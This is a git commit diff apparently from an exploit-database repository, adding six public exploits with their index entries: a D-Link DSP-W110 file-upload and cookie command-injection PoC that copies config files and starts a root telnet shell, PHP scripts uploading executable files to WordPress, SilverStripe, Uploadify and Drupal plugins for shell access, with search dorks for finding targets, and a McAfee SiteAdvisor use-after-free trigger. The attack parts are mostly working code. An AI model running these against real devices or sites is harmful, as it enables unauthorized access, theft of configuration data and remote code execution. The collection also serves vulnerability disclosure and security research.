DB: 2015-07-02
6 new exploits
This commit is contained in:
parent
7e7d4b0244
commit
2dc4d37f0f
7 changed files with 490 additions and 0 deletions
|
@ -33793,3 +33793,9 @@ id,file,description,date,author,platform,type,port
|
|||
37447,platforms/asp/webapps/37447.txt,"C2Box 4.0.0(r19171) - CSRF Vulnerability",2015-06-30,"Wissam Bashour",asp,webapps,0
|
||||
37448,platforms/multiple/remote/37448.rb,"Adobe Flash Player Drawing Fill Shader Memory Corruption",2015-06-30,metasploit,multiple,remote,0
|
||||
37449,platforms/hardware/webapps/37449.txt,"Polycom RealPresence Resource Manager < 8.4 - Multiple Vulnerabilities",2015-06-30,"SEC Consult",hardware,webapps,0
|
||||
37450,platforms/php/webapps/37450.txt,"Amazon S3 Uploadify Script 'uploadify.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
|
||||
37451,platforms/php/webapps/37451.txt,"SilverStripe Pixlr Image Editor 'upload.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
|
||||
37452,platforms/php/webapps/37452.txt,"WordPress Flip Book 'php.php' Arbitrary File Upload Vulnerability",2012-06-23,"Sammy FORGIT",php,webapps,0
|
||||
37453,platforms/php/webapps/37453.php,"Drupal Drag & Drop Gallery 'upload.php' Arbitrary File Upload Vulnerability",2012-06-25,"Sammy FORGIT",php,webapps,0
|
||||
37454,platforms/hardware/webapps/37454.txt,"D-Link DSP-W w110 v1.05b01 - Multiple Vulnerabilities",2015-07-01,DNO,hardware,webapps,0
|
||||
37456,platforms/windows/dos/37456.html,"McAfee SiteAdvisor 3.7.2 (firefox) Use After Free PoC",2015-07-01,"Marcin Ressel",windows,dos,0
|
||||
|
|
Can't render this file because it is too large.
|
168
platforms/hardware/webapps/37454.txt
Executable file
168
platforms/hardware/webapps/37454.txt
Executable file
|
@ -0,0 +1,168 @@
|
|||
# Exploit Title: D-Link DSP-W Arbitrary Arbitrary file upload
|
||||
# Date: 30/06/2015
|
||||
# Exploit Author: DNO
|
||||
# Vendor Homepage: [link]
|
||||
# Version: w110 v1.05b01
|
||||
# Tested on: linux
|
||||
# CVE : N/A
|
||||
|
||||
========================================
|
||||
|
||||
the only 'filtering' on this resources appears to be a sprintf()
|
||||
call which statically prefixes a submitted 'dev' argument with '/www'.
|
||||
However,
|
||||
if a HTTP request is performed without a 'dev' argument at all, the
|
||||
sprintf() call is never reached,
|
||||
and a fully-qualified path can be provided in the 'path' parameter -
|
||||
bypassing the upload path restriction.
|
||||
|
||||
***************
|
||||
# Upload arbitrary files to the device.
|
||||
echo 'Some String' > test.txt
|
||||
curl \
|
||||
-X POST \
|
||||
-i \
|
||||
-F name=@test.txt \
|
||||
--http1.0 \
|
||||
'192.168.1.3/web_cgi.cgi?&request=UploadFile&path=/etc/'
|
||||
|
||||
========================================
|
||||
|
||||
# Exploit Title: D-Link DSP-W Diagnostic Information " Get info"
|
||||
# Date: 30/06/2015
|
||||
# Exploit Author: DNO
|
||||
# Version: w110 v1.05b01
|
||||
# Tested on: linux
|
||||
# CVE : N/A
|
||||
|
||||
========================================
|
||||
Severity Level:
|
||||
===============
|
||||
High
|
||||
===============
|
||||
Patches made to lighttpd by the vendor of this device allows an attacker to
|
||||
query the device, without authentication, for the following information:
|
||||
|
||||
# Current WLAN SSIDs
|
||||
# Current WLAN channels
|
||||
# LAN and WAN MAC addressing
|
||||
# Current firmware version information
|
||||
# Hardware version information
|
||||
|
||||
Although not sensitive information, it may allow for identification of
|
||||
devices running vulnerable firmware versions.
|
||||
|
||||
=========================================
|
||||
# Information query.
|
||||
curl \
|
||||
192.168.1.3/mplist.txt
|
||||
|
||||
========================================
|
||||
#ruby poc
|
||||
----
|
||||
|
||||
# DSP-W110-Lighttpd PoC.
|
||||
|
||||
require 'pp'
|
||||
require 'optparse'
|
||||
require 'restclient'
|
||||
|
||||
# Set defaults and parse command line arguments
|
||||
options = {}
|
||||
|
||||
options[:addr] = "192.168.0.60"
|
||||
options[:port] = 80
|
||||
|
||||
OptionParser.new do |option|
|
||||
|
||||
option.on("--address [ADDRESS]", "Destination hostname or IP") do |a|
|
||||
options[:addr] = a
|
||||
end
|
||||
|
||||
option.on("--port [PORT]", "Destination TCP port") do |p|
|
||||
options[:port] = p
|
||||
end
|
||||
|
||||
option.parse!
|
||||
|
||||
end
|
||||
|
||||
# Define which actions we will be using.
|
||||
actions = [
|
||||
{
|
||||
:name => "Get device information",
|
||||
:call => "txt_parser",
|
||||
:path => "mplist.txt",
|
||||
},
|
||||
{
|
||||
:name => "Snatch configuration",
|
||||
:call => "noop",
|
||||
:path => "HNAP1",
|
||||
:cookies => { :cookie => "`cp /etc/co* /www/`" }
|
||||
},
|
||||
{
|
||||
:name => "Fetch configuration",
|
||||
:call => "conf_writer",
|
||||
:path => "config.sqlite",
|
||||
},
|
||||
{
|
||||
:name => "Enable telnet (root)",
|
||||
:call => "noop",
|
||||
:path => "HNAP1",
|
||||
:cookies => { :cookie => "`telnetd -l/bin/sh`" }
|
||||
}
|
||||
]
|
||||
|
||||
def noop(val)
|
||||
return
|
||||
end
|
||||
|
||||
def txt_parser(txt)
|
||||
txt.split(/\r?\n/).each do |line|
|
||||
puts " #{line}"
|
||||
end
|
||||
end
|
||||
|
||||
def conf_writer(txt)
|
||||
begin
|
||||
f = File.open('./config.sqlite', 'wb')
|
||||
rescue => e
|
||||
puts "[!] Failed to open config.sqlite for writing #{e.message}"
|
||||
end
|
||||
f.write(txt)
|
||||
f.close
|
||||
puts "[*] Configuration fetched into 'config.sqlite'"
|
||||
end
|
||||
|
||||
# Iterate over all actions and attempt to execute.
|
||||
url = "http://#{options[:addr]}:#{options[:port]}"
|
||||
|
||||
puts "[!] Attempting to extract information from #{url}"
|
||||
|
||||
actions.each do |action|
|
||||
|
||||
# Fire the request and ensure a 200 OKAY.
|
||||
begin
|
||||
response = RestClient.get(
|
||||
"#{url}/#{action[:path]}",
|
||||
{:cookies => action[:cookies]}
|
||||
)
|
||||
rescue
|
||||
puts "[!] Failed to query remote host."
|
||||
abort
|
||||
end
|
||||
|
||||
if response.code != 200
|
||||
puts "[-] '#{action[:name]}' failed with response: #{response.code}"
|
||||
next
|
||||
end
|
||||
|
||||
# Send to the processor.
|
||||
puts "[*] #{action[:name]} request succeeded."
|
||||
send(action[:call], response.body())
|
||||
|
||||
end
|
||||
===================================
|
||||
|
||||
contact me FB : FB.COM/haker.dyno
|
||||
Copyright © 2015 /DNO/
|
64
platforms/php/webapps/37450.txt
Executable file
64
platforms/php/webapps/37450.txt
Executable file
|
@ -0,0 +1,64 @@
|
|||
source: http://www.securityfocus.com/bid/54170/info
|
||||
|
||||
Amazon S3 Uploadify Script is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
Amazon S3 Uploadify Script 1.01 is vulnerable; other versions may also be affected.
|
||||
|
||||
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
||||
0 _ __ __ __ 1
|
||||
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
||||
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
||||
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
||||
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
||||
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
||||
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
||||
1 \ \____/ >> Exploit database separated by exploit 0
|
||||
0 \/___/ type (local, remote, DoS, etc.) 1
|
||||
1 1
|
||||
0 [+] Site : 1337day.com 0
|
||||
1 [+] Support e-mail : submit[at]1337day.com 1
|
||||
0 0
|
||||
1 ######################################### 1
|
||||
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
|
||||
1 ######################################### 0
|
||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||
##################################################
|
||||
# Description : uploadify-amazon-s3 Arbitrary File Upload Vulnerability
|
||||
# Version : 1.01
|
||||
# Link : http://code.google.com/p/uploadify-amazon-s3/
|
||||
# Software : http://code.google.com/p/uploadify-amazon-s3/downloads/detail?name=uploadify-amazon-s3-101.zip&can=2&q=
|
||||
# Date : 21-06-2012
|
||||
# Google Dork : inurl:/files/uploadify/ -google
|
||||
# Site : 1337day.com Inj3ct0r Exploit Database
|
||||
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
|
||||
##################################################
|
||||
|
||||
|
||||
Exploit :
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php";
|
||||
|
||||
$ch = curl_init("http://www.exemple.com/files/uploadify/uploadify.php?folder=/files/uploadify/");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.exemple.com/files/uploadify/lo.php
|
||||
|
||||
lo.php
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
||||
|
||||
|
||||
# Site : 1337day.com Inj3ct0r Exploit Database
|
64
platforms/php/webapps/37451.txt
Executable file
64
platforms/php/webapps/37451.txt
Executable file
|
@ -0,0 +1,64 @@
|
|||
source: http://www.securityfocus.com/bid/54172/info
|
||||
|
||||
Pixlr Image Editor is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
Pixlr Image Editor 1.0.4 is vulnerable; other versions may also be affected.
|
||||
|
||||
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
||||
0 _ __ __ __ 1
|
||||
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
||||
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
||||
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
||||
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
||||
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
||||
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
||||
1 \ \____/ >> Exploit database separated by exploit 0
|
||||
0 \/___/ type (local, remote, DoS, etc.) 1
|
||||
1 1
|
||||
0 [+] Site : 1337day.com 0
|
||||
1 [+] Support e-mail : submit[at]1337day.com 1
|
||||
0 0
|
||||
1 ######################################### 1
|
||||
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
|
||||
1 ######################################### 0
|
||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||
##################################################
|
||||
# Description : Silverstripe Modules - Pixlr Image Editor Arbitrary File Upload Vulnerability
|
||||
# Version : 1.0.4
|
||||
# Link : http://www.silverstripe.org/pixlr-image-editor-module/
|
||||
# Software : http://www.silverstripe.org/assets/modules/stable/svn.github.com-silverstripe-pixlr.git-r54.tar.gz
|
||||
# Date : 21-06-2012
|
||||
# Google Dork : not discover
|
||||
# Site : 1337day.com Inj3ct0r Exploit Database
|
||||
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
|
||||
##################################################
|
||||
|
||||
|
||||
Exploit :
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php";
|
||||
|
||||
$ch = curl_init("http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/upload.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.exemple.com/silverstripe/pixlr/thirdparty/supa/data/lo.php
|
||||
|
||||
lo.php
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
||||
|
||||
|
||||
# Site : 1337day.com Inj3ct0r Exploit Database
|
64
platforms/php/webapps/37452.txt
Executable file
64
platforms/php/webapps/37452.txt
Executable file
|
@ -0,0 +1,64 @@
|
|||
source: http://www.securityfocus.com/bid/54173/info
|
||||
|
||||
Flip Book is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
Flip Book 1.0 is vulnerable; other versions may also be affected.
|
||||
|
||||
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
|
||||
0 _ __ __ __ 1
|
||||
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
|
||||
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
|
||||
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
|
||||
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
|
||||
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
|
||||
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
|
||||
1 \ \____/ >> Exploit database separated by exploit 0
|
||||
0 \/___/ type (local, remote, DoS, etc.) 1
|
||||
1 1
|
||||
0 [+] Site : 1337day.com 0
|
||||
1 [+] Support e-mail : submit[at]1337day.com 1
|
||||
0 0
|
||||
1 ######################################### 1
|
||||
0 I'm Sammy FORGIT member from Inj3ct0r Team 1
|
||||
1 ######################################### 0
|
||||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
|
||||
##################################################
|
||||
# Description : Wordpress Plugins - Flip Book Arbitrary File Upload Vulnerability
|
||||
# Version : 1.0
|
||||
# link : http://codecanyon.net/item/flip-book-wordpress-plugin/152641
|
||||
# Price : 30$
|
||||
# Date : 22-06-2012
|
||||
# Google Dork : inurl:/wp-content/plugins/flipbook/
|
||||
# Site : 1337day.com Inj3ct0r Exploit Database
|
||||
# Author : Sammy FORGIT - sam at opensyscom dot fr - http://www.opensyscom.fr
|
||||
##################################################
|
||||
|
||||
|
||||
Exploit :
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="lo.php";
|
||||
|
||||
$ch = curl_init("http://www.exemple.com/wordpress/wp-content/plugins/flipbook/php.php");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, array('qqfile'=>"@$uploadfile"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
|
||||
print "$postResult";
|
||||
|
||||
?>
|
||||
|
||||
Shell Access : http://www.exemple.com/wordpress/wp-includes/fb-images/lo.php
|
||||
|
||||
lo.php
|
||||
<?php
|
||||
phpinfo();
|
||||
?>
|
||||
|
||||
|
||||
# Site : 1337day.com Inj3ct0r Exploit Database
|
24
platforms/php/webapps/37453.php
Executable file
24
platforms/php/webapps/37453.php
Executable file
|
@ -0,0 +1,24 @@
|
|||
source: http://www.securityfocus.com/bid/54179/info
|
||||
|
||||
Drag & Drop Gallery is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.
|
||||
|
||||
An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.
|
||||
|
||||
Drag & Drop Gallery 6.X-1.5 is vulnerable; other versions may also be affected.
|
||||
|
||||
<?php
|
||||
|
||||
$uploadfile="db.php.gif";
|
||||
$uploadfile2="lo.php.gif";
|
||||
|
||||
$ch = curl_init("http://www.example.com/drupal/sites/all/modules/dragdrop_gallery/upload.php?nid=1&filedir=/drupal/sites/all/modules/dragdrop_gallery/");
|
||||
curl_setopt($ch, CURLOPT_POST, true);
|
||||
curl_setopt($ch, CURLOPT_POSTFIELDS, array('user_file[0]'=>"@$uploadfile",
|
||||
'user_file[1]'=>"@$uploadfile2"));
|
||||
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
|
||||
$postResult = curl_exec($ch);
|
||||
curl_close($ch);
|
||||
|
||||
print "$postResult";
|
||||
|
||||
?>
|
100
platforms/windows/dos/37456.html
Executable file
100
platforms/windows/dos/37456.html
Executable file
|
@ -0,0 +1,100 @@
|
|||
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
|
||||
<html>
|
||||
<head>
|
||||
<meta http-equiv="content-type" content="text/html; charset=windows-1250">
|
||||
<meta name="generator" content="PSPad editor, www.pspad.com">
|
||||
<title>McAfee SiteAdvisor 3.7.2 for firefox Use After Free Poc</title>
|
||||
</head>
|
||||
<body>
|
||||
<script>
|
||||
|
||||
/*
|
||||
Title: McAfee SiteAdvisor 3.7.2 (firefox) Use After Free
|
||||
Author: Marcin Ressel
|
||||
Twitter: https://twitter.com/m_ressel
|
||||
NPMcFFPlg32.dll
|
||||
McAfee SiteAdvisor 3.7.2
|
||||
Tested on: Windows 8.1 (x64) and firefox 38.0.5
|
||||
Homepage: https://www.siteadvisor.com/
|
||||
|
||||
Note: this vlun potentiali give us posibility to bruteforce base modules in memory
|
||||
to bypass ASLR/DEP because the bug doesn't have negative impact to webbrowser proces
|
||||
i mean firefox will not crash after trigger uaf i McAfee
|
||||
|
||||
0:107> !gflag
|
||||
Current NtGlobalFlag contents: 0x02001800
|
||||
htg - Enable heap tagging
|
||||
ust - Create user mode stack trace database
|
||||
hpa - Place heap allocations at ends of pages
|
||||
|
||||
0:107> g
|
||||
(1d68.1b54): Access violation - code c0000005 (first chance)
|
||||
First chance exceptions are reported before any exception handling.
|
||||
This exception may be expected and handled.
|
||||
eax=24b9efec ebx=00000000 ecx=00000000 edx=003bf030 esi=1a978ff0 edi=00000001
|
||||
eip=6f404391 esp=003bf014 ebp=003bf054 iopl=0 nv up ei pl zr na pe nc
|
||||
cs=0023 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00210246
|
||||
NPMcFFPlg32!CreateFFScriptable+0x141:
|
||||
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
|
||||
|
||||
...
|
||||
6f40437a 8b02 mov eax,dword ptr [edx]
|
||||
6f40437c 85c0 test eax,eax
|
||||
6f40437e 7402 je NPMcFFPlg32!CreateFFScriptable+0x132 (6f404382)
|
||||
6f404380 8b00 mov eax,dword ptr [eax]
|
||||
6f404382 8b4808 mov ecx,dword ptr [eax+8]
|
||||
6f404385 8b4004 mov eax,dword ptr [eax+4]
|
||||
6f404388 49 dec ecx
|
||||
6f404389 234a08 and ecx,dword ptr [edx+8]
|
||||
6f40438c 8b0488 mov eax,dword ptr [eax+ecx*4]
|
||||
6f40438f 8b00 mov eax,dword ptr [eax]
|
||||
6f404391 8b4008 mov eax,dword ptr [eax+8] ds:002b:24b9eff4=????????
|
||||
6f404394 eb45 jmp NPMcFFPlg32!CreateFFScriptable+0x18b (6f4043db)
|
||||
6f404396 8d45d0 lea eax,[ebp-30h]
|
||||
6f404399 50 push eax
|
||||
6f40439a e8d10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
|
||||
6f40439f 8bd0 mov edx,eax
|
||||
6f4043a1 8b02 mov eax,dword ptr [edx]
|
||||
6f4043a3 85c0 test eax,eax
|
||||
6f4043a5 7402 je NPMcFFPlg32!CreateFFScriptable+0x159 (6f4043a9)
|
||||
6f4043a7 8b00 mov eax,dword ptr [eax]
|
||||
6f4043a9 8b4808 mov ecx,dword ptr [eax+8]
|
||||
6f4043ac 8b4004 mov eax,dword ptr [eax+4]
|
||||
6f4043af 49 dec ecx
|
||||
6f4043b0 234a08 and ecx,dword ptr [edx+8]
|
||||
6f4043b3 8b3488 mov esi,dword ptr [eax+ecx*4]
|
||||
6f4043b6 8d45c4 lea eax,[ebp-3Ch]
|
||||
6f4043b9 50 push eax
|
||||
6f4043ba e8b10e0000 call NPMcFFPlg32!CreateFFScriptable+0x1020 (6f405270)
|
||||
6f4043bf 8bd0 mov edx,eax
|
||||
...
|
||||
|
||||
*/
|
||||
|
||||
var win = null;
|
||||
|
||||
function crash()
|
||||
{
|
||||
var doc = win.document;
|
||||
|
||||
var obj = doc;
|
||||
win.close();
|
||||
|
||||
for(var p in obj)
|
||||
{
|
||||
if(typeof obj[p] == 'string')
|
||||
{
|
||||
try{ obj[p] = "CCCC"; }catch(err){}
|
||||
}
|
||||
}
|
||||
}
|
||||
|
||||
win = window.open('data:text/html,','','width=20,height=20'); //you need disable popupBlocker
|
||||
win.onload = crash;
|
||||
|
||||
|
||||
|
||||
</script>
|
||||
|
||||
</body>
|
||||
</html>
|
Loading…
Add table
Reference in a new issue